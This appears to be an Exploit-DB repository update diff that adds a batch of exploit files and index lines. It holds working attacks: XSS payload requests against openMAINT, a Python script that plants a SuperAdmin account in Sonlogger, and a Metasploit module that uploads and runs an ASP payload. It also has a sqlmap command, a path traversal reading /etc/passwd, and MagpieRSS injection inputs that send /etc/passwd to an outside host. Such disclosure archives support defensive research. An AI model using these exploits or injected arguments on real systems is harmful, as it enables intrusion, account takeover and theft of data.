DB: 2021-03-16

13 changes to exploits/shellcodes

Libpango 1.40.8 - Denial of Service (PoC)
QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path
Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path
eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path
Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path
Zenario CMS 8.8.53370 - 'id' Blind SQL Injection
MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery
rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting
Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)

exploits/multiple/webapps/49649.txt

@@ -0,0 +1,151 @@
+# Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting
+# Date: 13/03/2021
+# Exploit Author: Hosein Vita
+# Vendor Homepage: https://www.openmaint.org/
+# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
+# Version: 2.1-3.3
+# Tested on: Linux
+
+Summary:
+
+Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters.
+
+Proof of concepts : 
+
+1-Login to you'r Dashboard As a low privilege user
+2-Click On Facilities and assets - Location - Sites 
+3- +Add card Building
+4- Code and name parameters both are vulnerable 
+
+
+POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+.....
+Cookie: ...
+
+
+{"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....}
+
+
+The Xss will  trigger in that form, and also if you click on "Map" button , the xss will trigger there
+
+
+
+------------------------------------------------------------------------
+Another Xss :
+
+1-Like above in Facilities click on Locations and click on complex 
+2-click + Add card Complex
+3-insert javascript payload to Code And Name
+
+
+POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+....
+Connection: close
+Referer: 
+Cookie: ....
+
+{"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...}
+
+
+4-Save it
+5-Back to Sites and click on previous card
+6- in position section click on "Complex" drop down 
+7- xss will trigger
+
+
+------------------------------------------------------------------------
+Another Xss:
+
+1-Like exmaples above go to Locations and click on Sites 
+2-Add Card Building or click  the one you created before
+3-in left menu click on "Relations" 
+4-click "Add relations" and select one of the options 
+5- Add Card and select one of the options
+6- insert javascript payload to code and name parameter 
+
+POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+Connection: close
+Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578
+
+{"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... }
+
+
+7- save it and close the form
+8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list 
+9- xss payload will trigger
+
+------------------------------------------------------
+
+Another Xss:
+
+1- In "Navigation" Bar click on "Configurations" 
+2- Click on parameter
+3- + Add card Parameter
+4- Insert javascript payload to Code and Value 
+
+PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+
+Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578
+
+{"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....}
+
+save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger
+
+
+-------------------------------------------------------
+
+Another Xss:
+
+1-Click Facilities and assets
+2-Locations
+3-Select one of cards 
+4-Click "Add Card"
+5-in "Attachments" tab click "Add attachment" select "Document" or "image"
+6-insert javascript payload in "Code" and "Description"
+
+
+PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+CMDBuild-ActionId: class.card.attachments.open
+CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8
+Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543
+Content-Length: 1020
+Connection: close
+Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578
+
+-----------------------------1049383330380851725139941543
+Content-Disposition: form-data; name="attachment"; filename="blob"
+Content-Type: application/json
+
+{"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...}
+-----------------------------1049383330380851725139941543--
+
+7-save it and xss will trigger

exploits/multiple/webapps/49650.py

@@ -0,0 +1,105 @@
+# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
+# Date: 04-02-2021
+# Exploit Author: Berkan Er
+# Vendor Homepage: https://www.sonlogger.com/
+# Version: 4.2.3.3
+# Tested on: Windows 10 Enterprise x64 Version 1803
+# A remote attacker can be create an user with SuperAdmin profile
+
+#!/usr/bin/python3
+
+import argparse
+import string
+import sys
+from random import random
+
+import requests
+import json
+
+banner = '''
+Sonlogger Log and Report System - v4.2.3.3
+Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
+
+Berkan Er <b3rsec@protonmail.com>
+@erberkan
+'''
+
+commonHeaders = {
+    'Content-type': 'application/json',
+    'Accept': 'application/json, text/javascript, */*; q=0.01',
+    'X-Requested-With': 'XMLHttpRequest'
+}
+
+
+def get_random_string():
+    res = ''.join(random.choices(string.ascii_lowercase, k=8))
+    print(res)
+    return str(res)
+
+
+def getProductInfo(host, port, flag):
+    response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo',
+                             data={},
+                             headers=commonHeaders)
+
+    print("[*] Status code: ", response.status_code)
+    print("[*] Product Version: ", response.json()['Version'])
+    info_json = json.dumps(response.json(), indent=2)
+
+    response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
+    user_json = json.dumps(response_1.json(), indent=2)
+
+    if flag:
+        print("\n*** Product Infos=\n" + info_json)
+        print("\n*** Users=\n" + user_json)
+
+    if response.json()['Version'] == '4.2.3.3':
+        print("[+] It seems vulnerable !")
+        return True
+    else:
+        print("[!] It doesn't vulnerable !")
+        return False
+
+
+def createSuperAdmin(host, port):
+    payload = '''{
+        '_profilename':'superadmin_profile', 
+        '_username':'_hacker', 
+        '_password':'_hacker', 
+        '_fullname':'', '_email':''
+        }'''
+
+    response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders)
+    print("[*] STAUTS CODE:", response.status_code)
+    print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")
+
+    response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
+    json_formatted_str = json.dumps(response_1.json(), indent=2)
+    print("\n*** Users=\n" + json_formatted_str)
+
+
+def main():
+    print(banner)
+    
+    try:
+        host = sys.argv[1]
+        port = sys.argv[2]
+        action = sys.argv[3]
+
+        if action == 'TRUE':
+            if getProductInfo(host, port, False):
+                createSuperAdmin(host, port)
+        else:
+            getProductInfo(host, port, True)
+
+        print("KTHNXBYE!")
+
+    except:
+        print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP "
+              "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product "
+              "Infos")
+        print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")
+
+
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/49651.rb

@@ -0,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::EXE
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SonLogger Arbitrary File Upload Exploit',
+        'Description' => %q{
+          This module exploits an unauthenticated arbitrary file upload
+          via insecure POST request. It has been tested on version < 6.4.1 in
+          Windows 10 Enterprise.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
+          ],
+        'References' =>
+          [
+            ['CVE', '2021-27964'],
+            ['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/']
+          ],
+
+        'Platform' => ['win'],
+        'Privileged' => false,
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' =>
+          [
+            [
+              'SonLogger < 6.4.1',
+              {
+                'Platform' => 'win'
+              }
+            ],
+          ],
+        'DisclosureDate' => '2021-03-01',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(5000),
+        OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/'])
+      ]
+    )
+  end
+
+  def check_product_info
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
+      'method' => 'POST',
+      'data' => '',
+      'headers' => {
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Accept-Language' => 'en-US,en;q=0.5',
+        'Accept-Encoding' => 'gzip, deflate',
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    )
+  end
+
+  def check
+    begin
+      res = check_product_info
+
+      unless res
+        return CheckCode::Unknown('Target is unreachable.')
+      end
+
+      unless res.code == 200
+        return CheckCode::Unknown("Unexpected server response: #{res.code}")
+      end
+
+      version = Gem::Version.new(JSON.parse(res.body)['Version'])
+
+      if version < Gem::Version.new('6.4.1')
+        CheckCode::Vulnerable("SonLogger version #{version}")
+      else
+        CheckCode::Safe("SonLogger version #{version}")
+      end
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
+    end
+  end
+
+  def create_payload
+    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
+  end
+
+  def exploit
+    begin
+      print_good('Generate Payload')
+      data = create_payload
+
+      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
+      post_data = "--#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
+      post_data << "Content-Type: image/png\r\n"
+      post_data << "\r\n#{data}\r\n"
+      post_data << "--#{boundary}\r\n"
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'data' => post_data,
+        'headers' => {
+          'Accept' => 'application/json',
+          'Accept-Language' => 'en-US,en;q=0.5',
+          'X-Requested-With' => 'XMLHttpRequest'
+        }
+      )
+      unless res
+        fail_with(Failure::Unreachable, 'No response from server')
+      end
+
+      unless res.code == 200
+        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+      end
+
+      json_res = begin
+        JSON.parse(res.body)
+      rescue JSON::ParserError
+        nil
+      end
+
+      if json_res.nil? || json_res['Message'] == 'Error in saving file'
+        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
+      end
+
+      print_good('Payload has been uploaded')
+
+      handler
+
+      print_status('Executing payload...')
+      send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
+        'method' => 'GET'
+      }, 5)
+    end
+  rescue StandardError
+    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
+  end
+end

exploits/php/webapps/49642.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Zenario CMS 8.8.53370 - 'id' Blind SQL Injection 
+# Date: 05/02/2021
+# Exploit Author: Balaji Ayyasamy
+# Vendor Homepage: https://zenar.io/
+# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
+# Version: 8.8.53370
+# Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14
+
+# Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d
+
+Step 1 - Login to the zenario cms with admin credentials.
+Step 2 - Go to modules and select plugin library.
+Step 3 - Select any plugin and press delete button. Copy the delete request and send it to the sqlmap.
+
+Command - sqlmap -r request.txt -p id

exploits/php/webapps/49643.txt

@@ -0,0 +1,22 @@
+# Exploit Title: MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery
+# Date: 24 March 2021
+# Exploit Author: bl4ckh4ck5
+# Vendor Homepage: http://magpierss.sourceforge.net/ 
+# Software Link: https://sourceforge.net/projects/magpierss/files/magpierss/magpierss-0.72/magpierss-0.72.tar.gz/download
+# Version: MagpieRSS 0.72 and maybe older once aswell.
+# Tested on: Linux debian buster with default apache install.
+
+In MagpieRSS 0.72 on the /scripts/magpie_debug.php?url=testtest and /scripts/magpie_simple.php page i noticed there was a command injection in the RSS URL field when you send a https url and click the Parse RSS button.
+if you would send "https://www.example.com? -o /var/www/html/testtest.php" as input it would save the url output to the testtest.php file directly in the /var/www/html/ folder.
+the "?" is importent or it won't work.
+it is also possible to read any file if you send it like this "https://zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net? --data '@/etc/passwd'" then the page "zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net" would receive as POST data the /etc/passwd file.
+
+Outside of that because it uses the curl request directly from the prompt it is not restricted and it is possible to request internal pages like 127.0.0.1 however it is restricted to https requests only, but you can partionaly work arround that by sending the url like this "https://www.example.com? http://localhost/server-status/" then it also can send it to a http domain however then it is blind ssrf but on https domains you can make it vissable by first saving it to a file and if you can't write in the /var/www/html folder you sometimes can write it to the /tmp/testtest.txt and use "https://www.example.com? --data '@/tmp/testtest.txt'" to retrieve that file.
+
+The problem occures in the file /extlib/Snoopy.class.inc on line 660:
+https://github.com/kellan/magpierss/blob/04d2a88b97fdba5813d01dc0d56c772d97360bb5/extlib/Snoopy.class.inc#L660
+On that page there they use a escapeshellcmd command to escape the https url however they didn't put it between quotes.
+so it's possible to add a "-" to this and rewrite the curl command on the /scripts/magpie_debug.php and /scripts/magpie_simple.php page.
+from there on you can esculate it to Server side request forgery or Code injection.
+
+It mostlickly affects most versions but i have only tested it on version 0.72.

exploits/php/webapps/49644.txt

@@ -0,0 +1,24 @@
+# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
+# Date: 2021-03-12
+# Exploit Author: 5a65726f
+# Vendor Homepage: https://www.rconfig.com
+# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
+# Version: rConfig v3.9.6
+# Install scripts  :
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Tested on: centOS 7
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+
+# Description:
+rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path.  ajaxGetFileByPath.php allows authenticated users to download any file on the server.
+
+The following steps can be carried out in duplicating this vulnerability.
+
+- Login the rConfig application with your credentials.
+- Enter the following link to your browser: 
+http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd

exploits/windows/local/49645.txt

@@ -0,0 +1,34 @@
+# Exploit Title: QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2021-03-14
+# Vendor Homepage: https://www.qnap.com
+# Tested Version: 5.0.0.13230
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "QVR" | findstr /i /v """
+
+QVRService	QVRService	C:\Program Files (x86)\QNAP\QVR\QVRService.exe	Auto
+
+
+# Service info:
+
+C:\>sc qc "QVRService"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: QVRService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\QNAP\QVR\QVRService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : QVRService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/49646.txt

@@ -0,0 +1,34 @@
+# Exploit Title: Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2021-03-14
+# Vendor Homepage: https://www.realtek.com/en/
+# Tested Version: 700.1631
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Realtek" | findstr /i /v """
+
+Realtek11nSU	Realtek11nSU	C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe	Auto
+
+
+# Service info:
+
+C:\>sc qc "Realtek11nSU"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Realtek11nSU
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Realtek11nSU
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/49647.txt

@@ -0,0 +1,37 @@
+# Exploit Title: eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2021-03-14
+# Vendor Homepage: https://www.luidia.com
+# Tested Version: 2.5.0.9
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\
+Windows\\" | findstr /i "eBeam" | findstr /i /v """
+
+
+eBeam Device Service	eBeam Device Service	C:\Program Files (x86)\Luidia\eBeam Device Service\eBeamDeviceServiceMain.exe	Auto
+
+
+# Service info:
+
+C:\>sc qc "eBeam Device Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: eBeam Device Service
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Luidia\eBeam Device Service\eBeamDeviceServiceMa
+in.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : eBeam Device Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/49648.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2021-03-14
+# Vendor Homepage: https://www.luidia.com
+# Software Link: http://down.myequil.com/dn/setup/ScrapBook_win/down.html
+# Tested Version: 3.6
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "eBeam" | findstr /i /v """
+
+
+eBeam Stylus Driver	eBeam Stylus Driver	C:\Program Files (x86)\Luidia\eBeam Stylus Driver\eBeam_Stylus_Driver.exe	Auto
+
+
+# Service info:
+
+C:\>sc qc "eBeam Stylus Driver"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: eBeam Stylus Driver
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Luidia\eBeam Stylus Driver\eBeam_Stylus_Driver.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : eBeam Stylus Driver
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

files_exploits.csv

@@ -6086,7 +6086,7 @@ id,file,description,date,author,type,platform,port
 45251,exploits/windows_x86-64/dos/45251.py,"SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)",2018-08-24,"Luis Martínez",dos,windows_x86-64,
 45257,exploits/windows_x86-64/dos/45257.txt,"Firefox 55.0.3 - Denial of Service (PoC)",2018-08-27,L0RD,dos,windows_x86-64,
 45261,exploits/ios/dos/45261.py,"Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)",2018-08-27,"Luis Martínez",dos,ios,
-45263,exploits/linux/dos/45263.sh,"Libpango 1.40.8 - Denial of Service (PoC)",2018-08-27,"Jeffery M",dos,linux,
+45263,exploits/multiple/dos/45263.sh,"Libpango 1.40.8 - Denial of Service (PoC)",2018-08-27,"Jeffery M",dos,multiple,
 45268,exploits/linux/dos/45268.txt,"Adobe Flash - AVC Processing Out-of-Bounds Read",2018-08-27,"Google Security Research",dos,linux,
 45275,exploits/windows/dos/45275.py,"Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)",2018-08-28,"Luis Martínez",dos,windows,
 45277,exploits/windows_x86-64/dos/45277.py,"Instagram App 41.1788.50991.0 - Denial of Service (PoC)",2018-08-28,"Ali Alipour",dos,windows_x86-64,
@@ -11282,6 +11282,10 @@ id,file,description,date,author,type,platform,port
 49631,exploits/windows/local/49631.txt,"Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,
 49632,exploits/windows/local/49632.txt,"bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,
 49641,exploits/windows/local/49641.txt,"Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths",2021-03-12,"Mohammed Alshehri",local,windows,
+49645,exploits/windows/local/49645.txt,"QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
+49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
+49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
+49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43827,3 +43831,9 @@ id,file,description,date,author,type,platform,port
 49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-11,testanull,webapps,windows,
 49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",2021-03-12,"Richard Jones",webapps,php,
 49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",2021-03-12,"Richard Jones",webapps,php,
+49642,exploits/php/webapps/49642.txt,"Zenario CMS 8.8.53370 - 'id' Blind SQL Injection",2021-03-15,"Balaji Ayyasamy",webapps,php,
+49643,exploits/php/webapps/49643.txt,"MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery",2021-03-15,bl4ckh4ck5,webapps,php,
+49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,5a65726f,webapps,php,
+49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,
+49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple,
+49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple,